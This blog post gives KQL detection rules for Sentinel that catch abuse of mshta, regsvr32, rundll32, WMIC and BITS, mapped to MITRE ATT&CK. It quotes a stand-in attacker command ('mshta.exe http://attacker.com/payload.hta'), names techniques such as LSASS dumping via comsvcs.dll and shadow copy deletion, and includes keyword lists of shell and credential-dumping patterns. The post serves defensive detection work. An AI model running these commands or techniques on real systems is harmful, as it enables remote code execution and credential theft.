Detecting Living-off-the-Land (LOLBin) Attacks: KQL and SPL Queries for Microsoft Sentinel and Splunk
Living-off-the-land (LOLBin) attacks are the single biggest detection gap in most SOC environments. Adversaries don’t need custom malware when Windows ships with mshta.exe, rundll32.exe, and wmic.exe — signed Microsoft binaries that antivirus ignores, allowlists whitelist, and EDR tools struggle to flag without behavioral context.
This post walks through production-ready KQL and SPL detection rules for five of the most abused LOLBins, all mapped to MITRE ATT&CK. These queries are from the df00tech detection library and are ready to schedule in Microsoft Sentinel or deploy as Splunk correlation searches.
Why LOLBins Are a Detection Problem
Traditional signature-based detection fails on LOLBins by design. The binary is legitimate. The file hash is clean. The process is expected. What’s abnormal is the behavior — the parent process, the command-line arguments, the network destination, the file path where output lands.
The challenge for SOC teams is threefold:
- Volume: These binaries execute thousands of times per day in normal operations. Writing a rule that catches attacker use without drowning analysts in false positives requires precise behavioral logic.
- Attacker awareness: Threat actors know these binaries are trusted. They actively design their techniques to blend in — using legitimate-looking arguments, avoiding known-bad paths, chaining multiple LOLBins.
- Coverage gaps: Most default SIEM content flags only the most obvious patterns (e.g.,
rundll32calling an.exe). Real detections need to cover the full technique surface.
The queries below address all three by using multi-factor risk scoring and parent process context rather than single-indicator matching.
1. mshta.exe — HTA Execution and Remote Script Loading (T1218.005)
mshta.exe (Microsoft HTML Application Host) was designed to run .hta files. Attackers use it to execute VBScript and JavaScript inline, load remote HTML applications, and spawn shells — all using a signed Windows binary.
Common abuse patterns: Phishing attachments launching mshta.exe directly from Office applications. Remote URL execution via mshta.exe http://attacker.com/payload.hta. Using GetObject() to load COM objects for code execution.
let SuspiciousPatterns = dynamic([
"http://", "https://", "vbscript:", "javascript:",
"GetObject", "WScript.Shell", "Shell.Application",
"CreateObject", "ActiveXObject", "cmd.exe", "powershell"
]);
DeviceProcessEvents
| where Timestamp > ago(24h)
| where FileName =~ "mshta.exe"
| extend RemoteURL = ProcessCommandLine has_any ("http://", "https://")
| extend InlineScript = ProcessCommandLine has_any ("vbscript:", "javascript:")
| extend GetObject = ProcessCommandLine has "GetObject"
| extend ShellInvoke = ProcessCommandLine has_any ("WScript.Shell", "Shell.Application", "CreateObject")
| extend SuspiciousParent = InitiatingProcessFileName has_any (
"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe", "explorer.exe")
| extend HTAPath = ProcessCommandLine has_any ("Temp", "AppData", "Downloads", "Desktop", "Public")
| project Timestamp, DeviceName, AccountName, ProcessCommandLine, InitiatingProcessFileName,
InitiatingProcessCommandLine, RemoteURL, InlineScript, GetObject, ShellInvoke,
SuspiciousParent, HTAPath
| sort by Timestamp descWhat to investigate: Any result where RemoteURL = true is high-confidence malicious. Treat InlineScript = true combined with SuspiciousParent = true as critical — this is the Office macro to mshta execution path used by TA453, Lazarus Group, and TA571.
Full detection with SPL equivalent: T1218.005 — mshta
2. regsvr32.exe — Squiblydoo and Remote SCT Execution (T1218.010)
regsvr32.exe registers COM server DLLs. Attackers discovered it can also load remote scriptlet (.sct) files over HTTP via scrobj.dll — a technique called “Squiblydoo” that has been in active use since 2016 and remains effective because it’s a signed, network-capable binary that proxy solutions often whitelist.
DeviceProcessEvents
| where Timestamp > ago(24h)
| where FileName =~ "regsvr32.exe"
| extend RemoteSCT = ProcessCommandLine has_any ("http://", "https://")
| extend ScrObj = ProcessCommandLine has "scrobj.dll"
| extend UnregisterFlag = ProcessCommandLine has_any ("/u", "/unregister")
| extend SuspiciousPath = ProcessCommandLine has_any (
"Temp", "AppData", "Downloads", "Public", "Desktop", "ProgramData")
| extend InlineScript = ProcessCommandLine has "/i:"
| extend SuspiciousParent = InitiatingProcessFileName has_any (
"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe",
"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe")
| where RemoteSCT or ScrObj or (SuspiciousPath and SuspiciousParent) or SuspiciousParent
| project Timestamp, DeviceName, AccountName, ProcessCommandLine, InitiatingProcessFileName,
InitiatingProcessCommandLine, RemoteSCT, ScrObj, UnregisterFlag, SuspiciousPath,
InlineScript, SuspiciousParent
| sort by Timestamp descTuning note: The key filter is RemoteSCT or ScrObj — any regsvr32.exe command referencing a URL or scrobj.dll is highly suspicious. The SuspiciousParent filter is your noise reducer for the path-based checks. In environments with legitimate software using regsvr32, add those parent processes to an exclusion list rather than loosening the path filters.
Full detection with SPL equivalent: T1218.010 — regsvr32
3. rundll32.exe — DLL Execution, MiniDump, and COM Hijacking (T1218.011)
rundll32.exe is one of the most abused binaries in Windows. It legitimately calls exported DLL functions — but attackers use it to execute JavaScript via mshtml, dump LSASS via comsvcs.dll MiniDump, load remote COM scriptlets, and invoke DLL exports for proxy execution.
let SuspiciousDLLs = dynamic([
"zipfldr.dll", "ieframe.dll", "comsvcs.dll", "shell32.dll",
"advpack.dll", "shdocvw.dll"]);
let SuspiciousFunctions = dynamic([
"MiniDump", "Control_RunDLL", "RunHTMLApplication",
"LaunchINFSection", "OpenURL"]);
DeviceProcessEvents
| where Timestamp > ago(24h)
| where FileName =~ "rundll32.exe"
| extend JavaScriptExec = ProcessCommandLine has_any ("javascript:", "mshtml", "RunHTMLApplication")
| extend RemoteSCT = ProcessCommandLine has_any ("http://", "https://", "GetObject(")
| extend MiniDump = ProcessCommandLine has "MiniDump"
| extend SuspiciousPath = ProcessCommandLine has_any (
"Temp", "AppData", "Downloads", "Public", "Desktop")
| extend OrdinalLoad = ProcessCommandLine matches regex @",#\d+"
| extend SuspiciousParent = InitiatingProcessFileName has_any (
"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe",
"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe")
| where JavaScriptExec or RemoteSCT or MiniDump or (SuspiciousPath and SuspiciousParent) or SuspiciousParent
| project Timestamp, DeviceName, AccountName, ProcessCommandLine, InitiatingProcessFileName,
InitiatingProcessCommandLine, JavaScriptExec, RemoteSCT, MiniDump,
SuspiciousPath, OrdinalLoad, SuspiciousParent
| sort by Timestamp descPriority alerts: MiniDump = true means LSASS dumping via comsvcs.dll — treat this as critical and correlate with the T1003.001 LSASS detection. JavaScriptExec = true or RemoteSCT = true is direct code execution through rundll32 and warrants immediate triage.
Full detection with SPL equivalent: T1218.011 — rundll32
4. WMIC — Remote Process Creation and Shadow Copy Deletion (T1047)
Windows Management Instrumentation is a legitimate administrative framework that attackers use for remote process creation, service manipulation, shadow copy deletion (ransomware pre-deployment), and reconnaissance. The detection needs to cover both wmic.exe commands and PowerShell’s WMI cmdlets.
let SuspiciousWmicArgs = dynamic([
"process call create", "shadowcopy delete", "shadowcopy where",
"/node:", "os get", "computersystem get", "service where",
"product get", "nicconfig", "logicaldisk get", "startup list"
]);
let SuspiciousWmiPSPatterns = dynamic([
"Invoke-WmiMethod", "Get-WmiObject", "Get-CimInstance",
"[wmiclass]", "[wmi]", "Win32_Process", "Win32_ShadowCopy",
"Win32_Service", "wmiexec"
]);
// WMI via wmiprvse.exe spawning unexpected children
DeviceProcessEvents
| where Timestamp > ago(24h)
| where InitiatingProcessFileName =~ "wmiprvse.exe"
| where FileName !in~ (
"WmiPrvSE.exe", "msiexec.exe", "svchost.exe",
"SearchIndexer.exe", "WerFault.exe", "dllhost.exe")
| project Timestamp, DeviceName, AccountName, FileName, ProcessCommandLine,
InitiatingProcessFileName, InitiatingProcessCommandLine,
DetectionBranch = "wmiprvse_child"The ransomware signal: shadowcopy delete via WMI is a near-universal step in ransomware deployment — executed by Akira, Black Basta, LockBit, and Play before encryption begins. In Sentinel, create a separate high-severity rule specifically for wmic.exe commands containing shadowcopy with automated response to isolate the host.
Full detection with SPL equivalent: T1047 — Windows Management Instrumentation
5. BITS Jobs — Background Download and Persistence (T1197)
Background Intelligent Transfer Service is designed for bandwidth-friendly downloads (Windows Update uses it). Attackers use bitsadmin.exe and PowerShell’s Start-BitsTransfer to download payloads to writable paths and — critically — to set notification commands that execute after transfer completes, creating a persistence mechanism that survives reboots.
let SuspiciousDestinations = dynamic([
"\\AppData\\Local\\Temp\\", "\\AppData\\Roaming\\",
"\\Users\\Public\\", "\\ProgramData\\", "\\Windows\\Temp\\"
]);
let SuspiciousExtensions = dynamic([
".exe", ".dll", ".ps1", ".bat", ".cmd", ".vbs", ".js", ".hta"
]);
DeviceProcessEvents
| where Timestamp > ago(24h)
| where FileName =~ "bitsadmin.exe"
| extend HasNotify = ProcessCommandLine has_any ("/SetNotifyCmdLine", "/SetNotifyFlags")
| extend HasTransfer = ProcessCommandLine has_any ("/transfer", "/addfile")
| extend SuspiciousDest = ProcessCommandLine has_any (SuspiciousDestinations)
| extend SuspiciousExt = ProcessCommandLine has_any (SuspiciousExtensions)
| extend ExternalDownload = ProcessCommandLine matches regex
@"https?://(?!.*\.microsoft\.com|.*\.windowsupdate\.com|.*\.windows\.com)[^\s]+"
| where HasNotify or HasTransfer or (SuspiciousDest and SuspiciousExt) or ExternalDownload
| project Timestamp, DeviceName, AccountName, ProcessCommandLine, InitiatingProcessFileName,
HasNotify, HasTransfer, SuspiciousDest, SuspiciousExt, ExternalDownload
| sort by Timestamp descThe persistence indicator: HasNotify = true combined with SuspiciousDest = true means an attacker is setting up BITS to execute a payload after download. This is particularly dangerous because the notification command runs as the job’s user, persists across reboots, and leaves minimal forensic traces unless you’re specifically monitoring BITS event logs (Event IDs 59, 60, 61 in Microsoft-Windows-Bits-Client).
Full detection with SPL equivalent: T1197 — BITS Jobs
Building a LOLBin Detection Stack
These five queries cover the most commonly abused LOLBins, but effective defense requires chaining them:
Execution chains to alert on:
outlook.exe→mshta.exe→cmd.exe(phishing to execution)powershell.exe→regsvr32.exe→ network connection (Squiblydoo variant)wmiprvse.exe→cmd.exe→bitsadmin.exe(WMI-based lateral movement with BITS persistence)rundll32.exewithcomsvcs.dll MiniDumpfollowed by LSASS access events
Tuning guidance: Start with SuspiciousParent as your primary filter for all five queries before enabling path-based or argument-based detection. Office applications spawning any of these binaries is almost universally malicious; expand from there once you’ve established a baseline.
Coverage beyond LOLBins: If these detections are triggering alerts, check for associated lateral movement techniques — LOLBin abuse rarely happens in isolation. Remote WMI execution in particular (the /node: flag in wmic.exe) is usually accompanied by pass-the-hash or pass-the-ticket for credential reuse.
Browse the full detection library for 700+ KQL and SPL rules mapped to MITRE ATT&CK, covering all major tactics from initial access through exfiltration.